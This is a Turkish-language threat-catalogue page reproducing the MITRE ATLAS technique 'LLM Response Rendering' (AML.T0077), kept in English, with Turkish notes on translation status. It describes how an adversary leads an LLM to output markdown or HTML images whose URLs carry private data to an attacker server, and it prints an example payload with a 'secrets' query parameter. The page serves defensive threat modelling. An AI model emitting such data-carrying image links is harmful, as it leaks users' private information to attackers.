AltaySec · ATLAS 2026.07
AML.T0077

LLM Response Rendering

Bu tekniğin yerleşik Türkçe adı henüz terminoloji kanonuna eklenmedi; İngilizce adı gösteriliyor.

C · Açıklama (tarayıcıda dürüstçe simüle edilemez) AML.TA0010 · Sızdırma

Açıklama

Türkçe çeviri henüz mevcut değil; resmi İngilizce açıklama gösteriliyor (uydurma çeviri yapılmaz).

An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary controlled server. The adversary gets AI to present an image to the user, which is rendered by the user's client application with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown For example, an LLM may produce the following markdown: `` ![ATLAS](https://atlas.mitre.org/image.png?secrets="private data") ` Which is rendered by the client as: ` <img src="https://atlas.mitre.org/image.png?secrets="private data"> ` When the request is received by the adversary's server hosting the requested image, they receive the contents of the secrets` query parameter.

Dürüstlük rozeti gerekçesi

Sızdırma çoğunlukla gerçek model/çıkarım API erişimine bağlıdır; bazı alt-teknikler kavram olarak gösterilebilir (bkz. üyelik çıkarımı), gerisi altyapı ister.

Kaynak

← Matrise dön